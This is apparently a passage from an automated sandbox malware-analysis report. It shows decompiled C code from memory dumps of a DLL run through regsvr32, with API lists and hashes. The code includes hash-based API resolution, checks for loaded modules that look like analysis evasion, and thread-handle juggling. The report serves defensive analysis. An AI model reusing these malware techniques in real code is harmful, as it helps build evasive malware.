        								_t103 = _t272 + 0x16b0; // 0xdf750008
        								_t170 =  *_t103;
        								_t273 = _t273 + 0xc;
        								__eflags = _t170 - 2;
        								if(_t170 < 2) {
        									_t172 = _t170 + 1;
        									__eflags = _t172;
        									 *(_t272 + 0x16b0) = _t172;
        								}
        								_t106 = _t272 + 0x2c; // 0x8df075ff
        								_t145 = _v16 +  *_t106;
        								__eflags = _t145;
        								_a4 =  *_t272;
        								_t108 = _t272 + 0x6c; // 0xa1ec8b55
        								_t234 =  *_t108;
        								_v8 = _t234;
        							}
        						}
        						_t111 = _a4 + 4; // 0x0
        						_t220 =  *_t111;
        						__eflags = _t145 - _t220;
        						_t221 =  <=  ? _t145 : _t220;
        						_t146 = _t221;
        						_a4 = _t221;
        						_t222 = _a8;
        						__eflags = _t146;
        						if(_t146 != 0) {
        							_t114 = _t272 + 0x38; // 0xf47d8bff
        							E10014C30(_t255,  *_t114 + _v8, _t146);
        							_t273 = _t273 + 0xc;
        							_t117 = _t272 + 0x6c;
        							 *_t117 =  *(_t272 + 0x6c) + _a4;
        							__eflags =  *_t117;
        							_t119 = _t272 + 0x6c; // 0xa1ec8b55
        							_t234 =  *_t119;
        						}
        						__eflags =  *(_t272 + 0x16c0) - _t234;
        						if( *(_t272 + 0x16c0) < _t234) {
        							 *(_t272 + 0x16c0) = _t234;
        						}
        						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
        						_t123 = _t272 + 0xc; // 0x452bf84d
        						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
        						__eflags = _t257 - 0xffff;
        						_t258 =  >  ? 0xffff : _t257;
        						_t124 = _t272 + 0x2c; // 0x8df075ff
        						_t151 =  *_t124;
        						_t125 = _t272 + 0x5c; // 0x84e85000
        						_t235 = _t234 -  *_t125;
        						__eflags = _t258 - _t151;
        						_t152 =  <=  ? _t258 : _t151;
        						__eflags = _t235 - ( <=  ? _t258 : _t151);
        						if(_t235 >= ( <=  ? _t258 : _t151)) {
        							L49:
        							__eflags = _t235 - _t258;
        							_t154 =  >  ? _t258 : _t235;
        							_a4 =  >  ? _t258 : _t235;
        							__eflags = _t222 - 4;
        							if(_t222 != 4) {
        								L53:
        								_t269 = 0;
        								__eflags = 0;
        							} else {
        								_t161 =  *_t272;
        								__eflags =  *(_t161 + 4);
        								_t154 = _a4;
        								if( *(_t161 + 4) != 0) {
        									goto L53;
        								} else {
        									__eflags = _t154 - _t235;
        									if(_t154 != _t235) {
        										goto L53;
        									} else {
        										_t269 = _t222 - 3;
        									}
        								}
        							}
        							_t131 = _t272 + 0x38; // 0xf47d8bff
        							_t132 = _t272 + 0x5c; // 0x84e85000
        							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
        							_t134 = _t272 + 0x5c;
        							 *_t134 =  *(_t272 + 0x5c) + _a4;
        							__eflags =  *_t134;
        							E10014AF0( *_t134,  *_t272);
        						} else {
        							__eflags = _t235;
        							if(_t235 != 0) {
        								L46:
        								__eflags = _t222;
        								if(_t222 != 0) {
        									_t162 =  *_t272;
        									__eflags =  *(_t162 + 4);
        									if( *(_t162 + 4) == 0) {
        										__eflags = _t235 - _t258;
        										if(_t235 <= _t258) {
        											goto L49;
        										}
        									}
        								}
        							} else {
        								__eflags = _t222 - 4;
        								if(_t222 == 4) {
        									goto L46;
        								}
        							}
        						}
        						asm("sbb edi, edi");
        						_t271 =  ~_t269 & 0x00000002;
        						__eflags = _t271;
        						return _t271;
        					} else {
        						__eflags = _t218 - 4;
        						if(_t218 == 4) {
        							goto L34;
        						} else {
        							_t173 =  *_t272;
        							__eflags =  *(_t173 + 4);
        							if( *(_t173 + 4) != 0) {
        								goto L34;
        							} else {
        								_t88 = _t272 + 0x5c; // 0x84e85000
        								__eflags = _t254 -  *_t88;
        								if(_t254 !=  *_t88) {
        									goto L34;
        								} else {
        									return 1;
        								}
        							}
        						}
        					}
        				} else {
        					return 3;
        				}
        			}

        APIs
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: memcpy
        • String ID:
        • API String ID: 3510742995-0
        • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
        • Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
        • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
        • Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 70%
        			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
        				char _v516;
        				char _v556;
        				char _v564;
        				char _v568;
        				char _v572;
        				char _v576;
        				intOrPtr _v580;
        				char _v588;
        				signed int _v596;
        				intOrPtr _v602;
        				intOrPtr _v604;
        				char _v608;
        				CHAR* _v612;
        				CHAR* _v616;
        				signed int _v620;
        				signed int _v624;
        				signed int _v628;
        				signed int _v632;
        				char _v636;
        				intOrPtr _t119;
        				signed int _t122;
        				CHAR* _t124;
        				intOrPtr _t125;
        				CHAR* _t127;
        				WCHAR* _t130;
        				intOrPtr _t133;
        				intOrPtr _t137;
        				WCHAR* _t138;
        				intOrPtr _t142;
        				WCHAR* _t143;
        				CHAR* _t144;
        				intOrPtr _t145;
        				intOrPtr _t150;
        				intOrPtr _t153;
        				WCHAR* _t154;
        				signed int _t159;
        				WCHAR* _t160;
        				intOrPtr _t163;
        				intOrPtr _t165;
        				intOrPtr _t166;
        				intOrPtr _t170;
        				signed int _t173;
        				signed int _t178;
        				intOrPtr _t182;
        				WCHAR* _t184;
        				char _t186;
        				WCHAR* _t188;
        				intOrPtr _t200;
        				intOrPtr _t211;
        				signed int _t215;
        				char _t220;
        				WCHAR* _t231;
        				intOrPtr _t235;
        				intOrPtr _t238;
        				intOrPtr _t239;
        				intOrPtr _t246;
        				signed int _t248;
        				WCHAR* _t249;
        				CHAR* _t250;
        				intOrPtr _t262;
        				void* _t271;
        				intOrPtr _t272;
        				signed int _t277;
        				void* _t278;
        				intOrPtr _t280;
        				signed int _t282;
        				void* _t298;
        				void* _t299;
        				intOrPtr _t305;
        				CHAR* _t326;
        				void* _t328;
        				WCHAR* _t329;
        				intOrPtr _t331;
        				WCHAR* _t333;
        				signed int _t335;
        				intOrPtr* _t337;
        				void* _t338;
        				void* _t339;
        				void* _t353;
        
        				_t353 = __fp0;
        				_t337 = (_t335 & 0xfffffff8) - 0x26c;
        				_t119 =  *0x1001e688; // 0x2120590
        				_v620 = _v620 & 0x00000000;
        				_t328 = __ecx;
        				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
        					L7:
        					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
        					E1000A86D( &_v556, _t14, _t351);
        					_t298 = 0x64;
        					_t122 = E1000A471( &_v556, _t298);
        					 *0x1001e748 = _t122;
        					if(_t122 != 0) {
        						_push(0x4e5);
        						_t299 = 0x10;
        						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
        						 *_t337 = 0x610;
        						_t124 = E100095E1(0x1001b9cc);
        						_push(0);
        						_push(_t124);
        						_v612 = _t124;
        						_t125 =  *0x1001e688; // 0x2120590
        						_t127 = E100092E5(_t125 + 0x228);
        						_t338 = _t337 + 0xc;
        						_v616 = _t127;
        						E100085D5( &_v612);
        						_t130 = E1000B269(_t127);
        						_t246 = 3;
        						__eflags = _t130;
        						if(_t130 != 0) {
        							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
        							 *_t328 = _t246;
        						}
        						E1000861A( &_v616, 0xfffffffe);
        						_t133 =  *0x1001e688; // 0x2120590
        						_t22 = _t133 + 0x114; // 0x21206a4
        						E10004A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
        						_t262 =  *0x1001e688; // 0x2120590
        						_t339 = _t338 + 0x14;
        						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
        						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
        							L17:
        							asm("stosd");
        							asm("stosd");
        							asm("stosd");
        							asm("stosd");
        							asm("stosd");
        							_v572 = _t328;
        							_v576 =  *((intOrPtr*)(_t262 + 0x214));
        							_t137 =  *0x1001e680; // 0x0
        							_t138 =  *(_t137 + 8);
        							__eflags = _t138;
        							if(_t138 != 0) {
        								 *_t138(0, 0, 1,  &_v568,  &_v564);
        							}
        							_v620 = _v620 & 0x00000000;
        							E1000E2C6(_t353,  &_v576);
        							_pop(_t262);
        							_t142 =  *0x1001e6b4; // 0x219fc48
        							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
        							__eflags = _t143;
        							if(_t143 == 0) {
        								E1000E2C6(_t353,  &_v588);
        								_t235 =  *0x1001e6b4; // 0x219fc48
        								_pop(_t262);
        								 *((intOrPtr*)(_t235 + 0xc))(_v632);
        							}
        							__eflags =  *0x1001e73c;
        							if( *0x1001e73c <= 0) {
        								goto L36;
        							} else {
        								_t165 =  *0x1001e680; // 0x0
        								__eflags =  *(_t165 + 8);
        								if( *(_t165 + 8) != 0) {
        									_t231 =  *(_t165 + 0xc);
        									__eflags = _t231;
        									if(_t231 != 0) {
        										 *_t231(_v580);
        									}
        								}
        								_t166 =  *0x1001e688; // 0x2120590
        								_t262 =  *((intOrPtr*)(_t166 + 0x214));
        								__eflags = _t262 - _t246;
        								if(_t262 == _t246) {
        									goto L36;
        								} else {
        									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
        									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
        										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
        										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
        											E100049A5();
        											asm("stosd");
        											asm("stosd");
        											asm("stosd");
        											asm("stosd");
        											_t170 =  *0x1001e684; // 0x219faa0
        											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
        											_t262 = _v602;
        											_t248 = 0x3c;
        											_t173 = _t262 + 0x00000002 & 0x0000ffff;
        											_v596 = _t173;
        											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
        											_t178 = _t262 + 0x0000000e & 0x0000ffff;
        											_v624 = _t178;
        											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
        											_t182 =  *0x1001e688; // 0x2120590
        											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
        											_t339 = _t339 + 0xc;
        											__eflags = _t184;
        											if(_t184 >= 0) {
        												_t333 = E10008604(0x1000);
        												_v616 = _t333;
        												_pop(_t262);
        												__eflags = _t333;
        												if(_t333 != 0) {
        													_t186 = E1000109A(_t262, 0x148);
        													_t305 =  *0x1001e688; // 0x2120590
        													_v636 = _t186;
        													_push(_t305 + 0x648);
        													_push(0xa);
        													_push(7);
        													_t271 = 2;
        													E1000902D(_t271,  &_v572);
        													_t272 =  *0x1001e688; // 0x2120590
        													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
        													_t339 = _t339 + 0x18;
        													_v632 = _t188;
        													__eflags = _t188;
        													if(_t188 != 0) {
        														_push(_v624 % _t248 & 0x0000ffff);
        														_push(_v628 & 0x0000ffff);
        														_push(_v596 % _t248 & 0x0000ffff);
        														_push(_v620 & 0x0000ffff);
        														_push(_v632);
        														_push( &_v572);
        														_t200 =  *0x1001e688; // 0x2120590
        														__eflags = _t200 + 0x1020;
        														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
        														E100085D5( &_v636);
        														E1000A911(_t333, 0, 0xbb8, 1);
        														E1000861A( &_v632, 0xfffffffe);
        														_t339 = _t339 + 0x44;
        													}
        													E1000861A( &_v616, 0xfffffffe);
        													_pop(_t262);
        												}
        											}
        										}
        										goto L36;
        									}
        									__eflags = _t262 - 2;
        									if(_t262 != 2) {
        										goto L36;
        									}
        									E100049A5();
        									asm("stosd");
        									asm("stosd");
        									asm("stosd");
        									asm("stosd");
        									_t211 =  *0x1001e684; // 0x219faa0
        									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
        									_t215 = _v602 + 0x00000002 & 0x0000ffff;
        									_v628 = _t215;
        									_t277 = 0x3c;
        									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
        									_t249 = E10008604(0x1000);
        									_v624 = _t249;
        									_pop(_t278);
        									__eflags = _t249;
        									if(_t249 != 0) {
        										_t220 = E100095E1(_t278, 0x32d);
        										_t280 =  *0x1001e688; // 0x2120590
        										_push(_t280 + 0x228);
        										_t282 = 0x3c;
        										_v636 = _t220;
        										_push(_v628 % _t282 & 0x0000ffff);
        										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
        										E100085D5( &_v636);
        										E1000A911(_t249, 0, 0xbb8, 1);
        										E1000861A( &_v624, 0xfffffffe);
        									}
        									goto L41;
        								}
        							}
        						} else {
        							_t238 =  *((intOrPtr*)(_t262 + 0x214));
        							__eflags = _t238 - _t246;
        							if(_t238 == _t246) {
        								goto L17;
        							}
        							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
        							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
        								L36:
        								_t144 = E100095E1(_t262, 0x610);
        								_push(0);
        								_push(_t144);
        								_v616 = _t144;
        								_t145 =  *0x1001e688; // 0x2120590
        								_t329 = E100092E5(_t145 + 0x228);
        								_v612 = _t329;
        								__eflags = _t329;
        								if(_t329 != 0) {
        									_t160 = E1000B269(_t329);
        									__eflags = _t160;
        									if(_t160 != 0) {
        										_t163 =  *0x1001e684; // 0x219faa0
        										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
        									}
        									E1000861A( &_v612, 0xfffffffe);
        								}
        								E100085D5( &_v616);
        								_t150 =  *0x1001e688; // 0x2120590
        								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
        								_t153 =  *0x1001e688; // 0x2120590
        								_t154 = _t153 + 0x228;
        								__eflags = _t154;
        								lstrcpynW(_t154,  *0x1001e738, 0x105);
        								_t331 =  *0x1001e688; // 0x2120590
        								_t117 = _t331 + 0x228; // 0x21207b8
        								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
        								E1000861A(0x1001e740, 0xfffffffe);
        								E1000861A(0x1001e738, 0xfffffffe);
        								L41:
        								_t159 = 0;
        								__eflags = 0;
        								L42:
        								return _t159;
        							}
        							__eflags = _t238 - 2;
        							if(_t238 != 2) {
        								goto L36;
        							}
        							goto L17;
        						}
        					}
        					L8:
        					_t159 = _t122 | 0xffffffff;
        					goto L42;
        				}
        				_t250 = E100095C7(0x6e2);
        				_v616 = _t250;
        				_t326 = E100095C7(0x9f5);
        				_v612 = _t326;
        				if(_t250 != 0 && _t326 != 0) {
        					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
        						_v620 = 1;
        					}
        					E100085C2( &_v616);
        					_t122 = E100085C2( &_v612);
        					_t351 = _v620;
        					if(_v620 != 0) {
        						goto L8;
        					}
        				}
        			}

        APIs
        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
        • GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
        • lstrcpynW.KERNEL32(02120158,00000105), ref: 1000526F
        • lstrcpynW.KERNEL32(02120368,00000105), ref: 10005283
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: HandleModulelstrcpyn
        • String ID:
        • API String ID: 3430401031-0
        • Opcode ID: d3734a70cf2f26b07b6158fdd21bfb9247da90fd0041dfad8ad4158361da4cd7
        • Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
        • Opcode Fuzzy Hash: d3734a70cf2f26b07b6158fdd21bfb9247da90fd0041dfad8ad4158361da4cd7
        • Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 75%
        			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
        				char _v16;
        				intOrPtr _v20;
        				char _v24;
        				char _v28;
        				void* _t13;
        				intOrPtr _t15;
        				signed int _t16;
        				intOrPtr _t17;
        				signed int _t18;
        				char _t20;
        				intOrPtr _t22;
        				void* _t23;
        				void* _t24;
        				intOrPtr _t29;
        				intOrPtr _t35;
        				intOrPtr _t41;
        				intOrPtr _t43;
        				intOrPtr _t48;
        				void* _t51;
        				signed int _t61;
        				signed int _t64;
        				void* _t71;
        
        				_t71 = __fp0;
        				_t61 = __ecx;
        				_t41 =  *0x1001e6dc; // 0x0
        				_t13 = E1000A4BF(_t41, 0);
        				while(_t13 < 0) {
        					E1000980C( &_v28);
        					_t43 =  *0x1001e6e0; // 0x0
        					_t15 =  *0x1001e6e4; // 0x0
        					_t41 = _t43 + 0xe10;
        					asm("adc eax, ebx");
        					__eflags = _t15 - _v24;
        					if(__eflags > 0) {
        						L9:
        						_t16 = 0xfffffffe;
        						L13:
        						return _t16;
        					}
        					if(__eflags < 0) {
        						L4:
        						_t17 =  *0x1001e684; // 0x219faa0
        						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
        						__eflags = _t18;
        						if(_t18 == 0) {
        							break;
        						}
        						_t35 =  *0x1001e684; // 0x219faa0
        						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
        						_t41 =  *0x1001e6dc; // 0x0
        						__eflags = 0;
        						_t13 = E1000A4BF(_t41, 0);
        						continue;
        					}
        					__eflags = _t41 - _v28;
        					if(_t41 >= _v28) {
        						goto L9;
        					}
        					goto L4;
        				}
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				_t20 =  *0x1001e6e8; // 0x0
        				_v28 = _t20;
        				_t22 = E1000A6A9(_t41, _t61,  &_v16);
        				_v20 = _t22;
        				if(_t22 != 0) {
        					_t23 = GetCurrentProcess();
        					_t24 = GetCurrentThread();
        					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
        					E1000980C(0x1001e6e0);
        					_t64 = E10001A1B( &_v28, E10001226, _t71);
        					__eflags = _t64;
        					if(_t64 >= 0) {
        						_push(0);
        						_push( *0x1001e760);
        						_t51 = 0x27;
        						E10009F06(_t51);
        					}
        				} else {
        					_t64 = _t61 | 0xffffffff;
        				}
        				_t29 =  *0x1001e684; // 0x219faa0
        				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
        				_t48 =  *0x1001e6dc; // 0x0
        				 *0x1001e6d0 = 0;
        				E1000A4DB(_t48);
        				E1000861A( &_v24, 0);
        				_t16 = _t64;
        				goto L13;
        			}

        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
        • Instruction ID: 912c1b93fe30e14ebce55579952f4eddc1cb52f7c5d97e94b218bb2c615be3ff
        • Opcode Fuzzy Hash: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
        • Instruction Fuzzy Hash: C831C036604264AFF344DFA4DCC5C6E77A9FB983D0B904A2AF941C32A5DA30ED048B52
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 73%
        			E10001B2D(void* __eflags, void* __fp0) {
        				char _v24;
        				char _v28;
        				void* _t12;
        				intOrPtr _t14;
        				void* _t15;
        				intOrPtr _t16;
        				void* _t17;
        				void* _t19;
        				void* _t20;
        				char _t24;
        				intOrPtr _t26;
        				intOrPtr _t28;
        				intOrPtr _t33;
        				intOrPtr _t38;
        				intOrPtr _t40;
        				void* _t41;
        				intOrPtr _t46;
        				void* _t48;
        				intOrPtr _t51;
        				void* _t61;
        				void* _t71;
        
        				_t71 = __fp0;
        				_t38 =  *0x1001e6f4; // 0x0
        				_t12 = E1000A4BF(_t38, 0);
        				while(_t12 < 0) {
        					E1000980C( &_v28);
        					_t40 =  *0x1001e700; // 0x0
        					_t14 =  *0x1001e704; // 0x0
        					_t41 = _t40 + 0x3840;
        					asm("adc eax, ebx");
        					__eflags = _t14 - _v24;
        					if(__eflags > 0) {
        						L13:
        						_t15 = 0;
        					} else {
        						if(__eflags < 0) {
        							L4:
        							_t16 =  *0x1001e684; // 0x219faa0
        							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
        							__eflags = _t17;
        							if(_t17 == 0) {
        								break;
        							} else {
        								_t33 =  *0x1001e684; // 0x219faa0
        								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
        								_t51 =  *0x1001e6f4; // 0x0
        								__eflags = 0;
        								_t12 = E1000A4BF(_t51, 0);
        								continue;
        							}
        						} else {
        							__eflags = _t41 - _v28;
        							if(_t41 >= _v28) {
        								goto L13;
        							} else {
        								goto L4;
        							}
        						}
        					}
        					L12:
        					return _t15;
        				}
        				E1000980C(0x1001e700);
        				_t19 = GetCurrentProcess();
        				_t20 = GetCurrentThread();
        				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				_t24 =  *0x1001e6e8; // 0x0
        				_v28 = _t24;
        				_t61 = E10001A1B( &_v28, E1000131E, _t71);
        				if(_t61 >= 0) {
        					_push(0);
        					_push( *0x1001e760);
        					_t48 = 0x27;
        					E10009F06(_t48);
        				}
        				if(_v24 != 0) {
        					E10006890( &_v24);
        				}
        				_t26 =  *0x1001e684; // 0x219faa0
        				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
        				_t28 =  *0x1001e758; // 0x0
        				 *0x1001e6ec = 0;
        				_t29 =  !=  ? 1 : _t28;
        				_t46 =  *0x1001e6f4; // 0x0
        				 *0x1001e758 =  !=  ? 1 : _t28;
        				E1000A4DB(_t46);
        				_t15 = _t61;
        				goto L12;
        			}

        APIs
        • GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
        • GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
        • GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
        • DuplicateHandle.KERNEL32 ref: 10001BD9
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: Current$Process$DuplicateHandleThread
        • String ID:
        • API String ID: 3566409357-0
        • Opcode ID: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
        • Instruction ID: 6a0302f5f4fd7db6b8bd225124d86af098f07b21623db759acfbad22203cc7cf
        • Opcode Fuzzy Hash: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
        • Instruction Fuzzy Hash: 50319C756083A19FF744DF64CCD886E77A9EB983D0B418968F601872A6DB30EC44CB52
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • GetWindowsDirectoryW.KERNEL32 ref: 10029B87
        • FindFirstChangeNotificationW.KERNEL32(10114AA8,00000000,00000020), ref: 10029BD2
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516656148.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10021000_regsvr32.jbxd
        Similarity
        • API ID: ChangeDirectoryFindFirstNotificationWindows
        • String ID: 1
        • API String ID: 3662519435-2212294583
        • Opcode ID: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
        • Instruction ID: a17468885719ca7b42c6c3de4681764e2a8d7b2457ed512f777c56a051c8a142
        • Opcode Fuzzy Hash: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
        • Instruction Fuzzy Hash: 3851CF72A043A08FE335CF28CCC85D677E1EB88302F21472ED58597295D6BAAC85CB81
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E1000DFAD(void* __ecx, intOrPtr __edx) {
        				signed int _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				intOrPtr _v20;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				char _v92;
        				intOrPtr _t41;
        				signed int _t47;
        				signed int _t49;
        				signed int _t51;
        				void* _t56;
        				struct HINSTANCE__* _t58;
        				_Unknown_base(*)()* _t59;
        				intOrPtr _t60;
        				void* _t62;
        				intOrPtr _t63;
        				void* _t69;
        				char _t70;
        				void* _t75;
        				CHAR* _t80;
        				void* _t82;
        
        				_t75 = __ecx;
        				_v12 = __edx;
        				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
        				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
        				if(_t41 == 0) {
        					L4:
        					return 0;
        				}
        				_t62 = _t41 + __ecx;
        				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
        				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
        				_t63 =  *((intOrPtr*)(_t62 + 0x18));
        				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
        				_t47 = 0;
        				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
        				_v8 = 0;
        				_v16 = _t63;
        				if(_t63 == 0) {
        					goto L4;
        				} else {
        					goto L2;
        				}
        				while(1) {
        					L2:
        					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
        					_t51 = _v8;
        					if((_t49 ^ 0x218fe95b) == _v12) {
        						break;
        					}
        					_t73 = _v20;
        					_t47 = _t51 + 1;
        					_v8 = _t47;
        					if(_t47 < _v16) {
        						continue;
        					}
        					goto L4;
        				}
        				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
        				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
        				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
        					return _t80;
        				} else {
        					_t56 = 0;
        					while(1) {
        						_t70 = _t80[_t56];
        						if(_t70 == 0x2e || _t70 == 0) {
        							break;
        						}
        						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
        						_t56 = _t56 + 1;
        						if(_t56 < 0x40) {
        							continue;
        						}
        						break;
        					}
        					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
        					 *((char*)(_t82 + _t56 - 0x54)) = 0;
        					if( *((char*)(_t56 + _t80)) != 0) {
        						_t80 =  &(( &(_t80[1]))[_t56]);
        					}
        					_t40 =  &_v92; // 0x6c6c642e
        					_t58 = LoadLibraryA(_t40);
        					if(_t58 == 0) {
        						goto L4;
        					}
        					_t59 = GetProcAddress(_t58, _t80);
        					if(_t59 == 0) {
        						goto L4;
        					}
        					return _t59;
        				}
        			}

        APIs
        • LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
        • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: AddressLibraryLoadProc
        • String ID: .dll
